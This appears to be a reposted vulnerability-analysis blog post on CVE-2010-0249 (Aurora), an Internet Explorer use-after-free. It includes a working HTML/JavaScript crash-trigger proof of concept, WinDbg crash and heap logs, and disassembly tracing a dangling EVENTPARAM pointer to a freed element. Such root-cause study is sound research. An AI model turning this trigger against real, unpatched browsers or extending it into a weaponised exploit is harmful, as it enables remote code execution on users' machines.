CVE-2010-0249 Aurora
The legendary Aurora vulnerability
Microsoft Internet Explorer invalid event operation memory corruption vulnerability

Microsoft Internet Explorer is the web browser bundled by default with Microsoft Windows.

Microsoft Internet Explorer has a memory corruption vulnerability in its handling of invalid event operations. Because the corresponding reference count is not incremented after an object is created, a malicious sequence of object operations can leave a pointer referencing memory that is reused after it has been freed. A remote attacker can lure a user into visiting a malicious web page that manipulates memory this way and execute arbitrary code on the user's system.
The POC is as follows:

<html>
<head>
<script>
var obj, event_obj;
function ev1(evt) {
    event_obj = document.createEventObject(evt);
    document.getElementById("sp1").innerHTML = "";
    window.setInterval(ev2, 1);
}
function ev2() {
    var data, tmp;
    data = "";
    tmp = unescape("%u0a0a%u0a0a");
    for (var i = 0 ; i < 4 ; i++) data += tmp;
    for (i = 0 ; i < obj.length ; i++ ) { obj[i].data = data; }
    event_obj.srcElement;
}
obj = new Array();
event_obj = null;
for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT");
</script>
</head>
<body>
<span id="sp1">
<img src="aurora.gif" onload="ev1(event)">
</span>
</body>
</html>

I could not find a suitable POC; this one I modified from an exploit found online, and it is somewhat clumsy.
Getting straight to the point: the crash immediately shows a use-after-free on the CBody object.

1:020> g
(c60.b2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=04f8ef08 ebx=ffffffff ecx=07540fc8 edx=041bf0f4 esi=07540fc8 edi=06c64fb0
eip=6837c400 esp=041bf0e4 ebp=041bf0fc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:07540fc8=????????
1:020> !heap -p -a ecx
    address 07540fc8 found in
    _DPH_HEAP_ROOT @ 1b1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    7db21d4:          7540000             2000
    702290b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77285674 ntdll!RtlDebugFreeHeap+0x0000002f
    77247aca ntdll!RtlpFreeHeap+0x0000005d
    77212d68 ntdll!RtlFreeHeap+0x00000142
    7710f1ac kernel32!HeapFree+0x00000014
    683e0fa4 mshtml!CBodyElement::`scalar deleting destructor'+0x00000022
    68387dd0 mshtml!CBase::SubRelease+0x00000022
    6837c482 mshtml!CElement::PrivateRelease+0x0000002a
    6837b034 mshtml!PlainRelease+0x00000025
    683d669d mshtml!PlainTrackerRelease+0x00000014
    6bd0a6f1 jscript!VAR::Clear+0x0000005f
    6bd26d66 jscript!GcContext::Reclaim+0x000000b6
    6bd24309 jscript!GcContext::CollectCore+0x00000123
    6bd24a4a jscript!CScriptRuntime::Run+0x000039dc
    6bd15c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    6bd15bfb jscript!ScrFncObj::Call+0x0000008d
    6bd15e11 jscript!CSession::Execute+0x0000015f
    6bd0f3ee jscript!NameTbl::InvokeDef+0x000001b5
    6bd0ea2e jscript!NameTbl::InvokeEx+0x0000012c
    6bd096de jscript!NameTbl::Invoke+0x00000070
    6834aa7b mshtml!CWindow::ExecuteTimeoutScript+0x00000087
    6834ab66 mshtml!CWindow::FireTimeOut+0x000000b6
    68376af7 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0x000000b6
    68371e57 mshtml!GlobalWndProc+0x00000183
    76c686ef USER32!InternalCallWinProc+0x00000023
    76c68876 USER32!UserCallWinProcCheckWow+0x0000014b
    76c689b5 USER32!DispatchMessageWorker+0x0000035e
    76c68e9c USER32!DispatchMessageW+0x0000000f
    6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452
    6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1
    76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab
    77111174 kernel32!BaseThreadInitThunk+0x0000000e

What is odd is that this vulnerability produces two different crashes.
1.

1:020> g
(e18.18c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=046a3f08 ebx=ffffffff ecx=07c4afd0 edx=0434f1a4 esi=07acaf58 edi=07f9afb0
eip=684188c7 esp=0434f198 ebp=0434f1ac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CEventObj::GenericGetElement+0x91:
684188c7 8b37            mov     esi,dword ptr [edi]  ds:0023:07f9afb0=????????

2.

1:021> g
(4e4.f68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=073f5f08 ebx=ffffffff ecx=06e9bfc8 edx=040feeec esi=06e9bfc8 edi=097a2fb0
eip=6837c400 esp=040feedc ebp=040feef4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:06e9bfc8=????????

Tracing the GenericGetElement function reveals the call relationship between the two crash sites:
.text:74E78864 ; =============== S U B R O U T I N E =======================================
.text:74E78864
.text:74E78864 ; Attributes: bp-based frame
.text:74E78864
.text:74E78864 ; private: long __thiscall CEventObj::GenericGetElement(struct IHTMLElement * *, long)
.text:74E78864 ?GenericGetElement@CEventObj@@AAEJPAPAUIHTMLElement@@J@Z proc near
.text:74E78864                                         ; CODE XREF: CEventObj::get_srcElement(IHTMLElement * *)+10p
.text:74E78864                                         ; CEventObj::get_toElement(IHTMLElement * *)+10p ...
.text:74E78864
.text:74E78864 var_8           = dword ptr -8
.text:74E78864 var_4           = dword ptr -4
.text:74E78864 arg_0           = dword ptr  8
.text:74E78864 arg_4           = dword ptr  0Ch
.text:74E78864 arg_8           = dword ptr  10h
.text:74E78864
.text:74E78864 ; FUNCTION CHUNK AT .text:74C3D32B SIZE 00000023 BYTES
.text:74E78864 ; FUNCTION CHUNK AT .text:74E7F850 SIZE 0000001E BYTES
.text:74E78864 ; FUNCTION CHUNK AT .text:74E8524A SIZE 00000030 BYTES
.text:74E78864 ; FUNCTION CHUNK AT .text:74EB0C78 SIZE 00000022 BYTES
.text:74E78864
.text:74E78864                 mov     edi, edi
.text:74E78866                 push    ebp
.text:74E78867                 mov     ebp, esp
.text:74E78869                 push    ecx
.text:74E7886A                 push    ecx
.text:74E7886B                 and     [ebp+var_4], 0
.text:74E7886F                 push    esi
.text:74E78870                 mov     esi, [ebp+arg_4]
.text:74E78873                 test    esi, esi
.text:74E78875                 jz      loc_74EB0C78
.text:74E7887B                 push    [ebp+arg_8]
.text:74E7887E                 and     dword ptr [esi], 0
.text:74E78881                 push    [ebp+arg_0]
.text:74E78884                 lea     eax, [ebp+var_8]
.text:74E78887                 call    ?GetUnknownPtr@CEventObj@@AAEJJPAPAUIUnknown@@@Z ; CEventObj::GetUnknownPtr(long,IUnknown * *)
.text:74E7888C                 test    eax, eax
.text:74E7888E                 jz      loc_74E78927
.text:74E78894                 mov     eax, [ebp+var_8]
.text:74E78897                 mov     ecx, [ebp+arg_0]
.text:74E7889A                 lea     edx, [ebp+var_8]
.text:74E7889D                 mov     [esi], eax
.text:74E7889F                 call    ?GetParam@CEventObj@@QAEJPAPAUEVENTPARAM@@@Z ; CEventObj::GetParam(EVENTPARAM * *)
.text:74E788A4                 mov     [ebp+var_4], eax
.text:74E788A7                 test    eax, eax
.text:74E788A9                 jnz     short loc_74E78927
.text:74E788AB                 mov     eax, [ebp+arg_8]
.text:74E788AE                 sub     eax, 3E9h
.text:74E788B3                 push    ebx
.text:74E788B4                 push    edi
.text:74E788B5                 jnz     loc_74E7F850
.text:74E788BB                 mov     eax, [ebp+var_8]
.text:74E788BE                 mov     edi, [eax]
.text:74E788C0                 mov     ebx, [eax+74h]
.text:74E788C3                 test    edi, edi
.text:74E788C5                 jz      short loc_74E78925
.text:74E788C7                 mov     esi, [edi]                // one crash site
.text:74E788C9                 test    esi, esi
.text:74E788CB                 jz      short loc_74E78925
.text:74E788CD                 mov     ecx, esi
.text:74E788CF                 call    ?Doc@CElement@@QBEPAVCDoc@@XZ ; CElement::Doc(void)   // the other crash site

Analysing this code shows the following.

CEventObj::GenericGetElement first obtains a pointer to a data structure through CEventObj::GetUnknownPtr, then reads the value at offset +00 of that structure. That value is itself a pointer, and it is dereferenced in turn to read another value. This final value is the ecx passed into CElement::Doc, that is, the pointer to the CBody element.
1:020> !heap -p -a eax
    address 06bf6f08 found in
    _DPH_HEAP_ROOT @ 1f1000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 6ab2410:          6bf6f08               f8 -          6bf6000             2000
    70228e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77284ea6 ntdll!RtlDebugAllocateHeap+0x00000030
    77247d96 ntdll!RtlpAllocateHeap+0x000000c4
    772134ca ntdll!RtlAllocateHeap+0x0000023a
    683ec873 mshtml!EVENTPARAM::operator new+0x00000013
    684fd2c5 mshtml!CDocument::createEventObject+0x00000083
    68532791 mshtml!Method_IDispatchpp_o0oVARIANTp+0x000000ea
    683f235c mshtml!CBase::ContextInvokeEx+0x000005dc
    683f25d5 mshtml!CBase::InvokeEx+0x00000025
    683fdf9a mshtml!DispatchInvokeCollection+0x0000014c
    683b4998 mshtml!CDocument::InvokeEx+0x000000f0
    683a3148 mshtml!CBase::VersionedInvokeEx+0x00000020
    683a3104 mshtml!PlainInvokeEx+0x000000eb
    68a3a22a jscript!IDispatchExInvokeEx2+0x00000104
    68a3a175 jscript!IDispatchExInvokeEx+0x0000006a
    68a3a3f6 jscript!InvokeDispatchEx+0x00000098
    68a3a4a0 jscript!VAR::InvokeByName+0x00000139
    68a4d8c8 jscript!VAR::InvokeDispName+0x0000007d
    68a4d96f jscript!VAR::InvokeByDispID+0x000000ce
    68a451b6 jscript!CScriptRuntime::Run+0x00002a97
    68a45c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
    68a45bfb jscript!ScrFncObj::Call+0x0000008d
    68a45e11 jscript!CSession::Execute+0x0000015f
    68a3f3ee jscript!NameTbl::InvokeDef+0x000001b5
    68a3ea2e jscript!NameTbl::InvokeEx+0x0000012c
    68a3a22a jscript!IDispatchExInvokeEx2+0x00000104
    68a3a175 jscript!IDispatchExInvokeEx+0x0000006a
    68a3f5f8 jscript!NameTbl::InvokeEx+0x0000037a
    684019cb mshtml!CScriptCollection::InvokeEx+0x0000008a
    683ff451 mshtml!CWindow::InvokeEx+0x000006ad
    683a3148 mshtml!CBase::VersionedInvokeEx+0x00000020
    683a3104 mshtml!PlainInvokeEx+0x000000eb

From the backtrace above, the data structure should be EVENTPARAM. Consulting the available references, offset +00 of EVENTPARAM holds a pointer to the CTreeNode.
1:020> g
Breakpoint 0 hit
eax=04687fc8 ebx=0725efd0 ecx=00000034 edx=00000000 esi=0725ef08 edi=05570e00
eip=68323aa3 esp=043af658 ebp=043af664 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CImgElement::CImgElement:
68323aa3 8bff            mov     edi,edi
1:020> ? esi
Evaluate expression: 119926536 = 0725ef08
1:020> g
Breakpoint 1 hit
eax=0989cfb0 ebx=00000000 ecx=0989cfb0 edx=00000000 esi=06fcdf40 edi=04687fc8
eip=6838ced0 esp=043af624 ebp=043af63c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
mshtml!CTreeNode::CTreeNode:
6838ced0 8bff            mov     edi,edi
1:020> ? eax
Evaluate expression: 160026544 = 0989cfb0
1:020> g
(b08.9bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=098d4f08 ebx=ffffffff ecx=04687fc8 edx=043af044 esi=04687fc8 edi=0989cfb0
eip=6837c400 esp=043af034 ebp=043af04c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CElement::Doc:
6837c400 8b01            mov     eax,dword ptr [ecx]  ds:0023:04687fc8=????????
1:020> dd 0989cfb0
0989cfb0  04687fc8 00000000 ffff4034 ffffffff
0989cfc0  00000051 00000000 abcdbbbb 00221000
0989cfd0  00000014 00001000 00000000 00000000
0989cfe0  0044e1c4 dcbabbbb 6ea50124 00000002
0989cff0  6ea4fef8 6ea500e4 6ea500d0 d0d0d0d0
0989d000  ???????? ???????? ???????? ????????
0989d010  ???????? ???????? ???????? ????????
0989d020  ???????? ???????? ???????? ????????

The debugging result confirms my guess.
這個(gè)洞的問題就是使用EVENTPARAM引用對(duì)象的時(shí)候,卻沒有增加對(duì)象的引用計(jì)數(shù)。導(dǎo)致了懸垂指針的產(chǎn)生。當(dāng)對(duì)象的引用計(jì)數(shù)耗盡,對(duì)象就會(huì)被釋放。但是EVENTPARAM的懸垂指針就產(chǎn)生了。
轉(zhuǎn)載于:https://www.cnblogs.com/Ox9A82/p/5837769.html